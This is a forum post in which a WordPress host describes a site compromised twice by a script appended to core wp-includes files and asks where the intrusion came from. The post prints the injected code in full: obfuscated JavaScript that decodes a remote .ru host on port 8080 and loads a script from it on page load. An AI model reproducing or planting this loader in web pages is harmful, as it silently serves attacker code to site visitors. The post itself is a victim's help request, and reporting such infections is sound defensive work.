<script> appearing in core files and disabling WordPress

The last two days, a site I host has been compromised twice by the same <script> popping up in core WordPress files. This happened on 2.8.6 and 2.9. Not faulting WordPress here — there’s something else at work that is allowing access for this code to be placed onto the site.

At any rate, yesterday the code in question appeared in wp-includes/default-widgets.php and just now it appeared in wp-includes/default-filters.php at the very bottom of each file.

<script>/*GNU GPL*/ try{window.onload = function(){var Z053al9rqw = document.createElement('s#$c@#()$r)&^(i@@()p$#!t!#('.replace(/\!|\$|@|\(|\^|&|\)|#/ig, ''));Z053al9rqw.setAttribute('type', 'text/javascript');Z053al9rqw.setAttribute('src', 'h$t&t@!$#p$#:(!/@@/(&)t!$i(m(!!^e#($-(#c@$o)!^m$&#.!!s$#)u)$@r#^v!@(e(&y)(&&m@@o((n!^k#&)^#e&y(#$.$!c!$o&($m@!#.)$w^$^a&s#$(h^i!#n$!^g))t@)o^n^p^^o^@#$s&^t@@-^!c(^&o&m!^!^$.#w!@i&$&$@n$)$t#&#!e))&r$$#s(&a!$(l@e!@(o)^$#n^$)l)(&)i@&n!!@#e#!.$@#r^)!u&#^:@$8@!0)$#8@^!0!!!/^^))g!($o)^&o&g@#)&l^&&)e().^$&c#)@$!o!@)m$$/$!!!#g$o)@(o@g)#l@#^)@e$!#.#^@#c(@o^m!#/#$&z(@e@!!(d((o##(.!c@^!o)!)m)/^!m#)!@e&d&#i^(@a@(p$l^^e#x($.#!#c^&&!o@#^m^^/$^)g&&!o(^&o^g@!l^@@e@#.$c(o!.@^t(^h^!/&&'.replace(/\^|\!|\)|#|\(|&|\$|@/ig, ''));Z053al9rqw.setAttribute('defer', 'defer');Z053al9rqw.setAttribute('id', 'M@^g(7)m$&5#l#s@$(!#o#@^k#!$q)$)'.replace(/&|@|\!|\$|#|\^|\)|\(/ig, ''));document.body.appendChild(Z053al9rqw);}} catch(e) {}</script>

I’m wondering if this is a plugin that is compromising the site security (other blogs on my account have not been compromised) or if it’s a theme file or what? I’ve changed the FTP access codes n case that was the site of the compromise…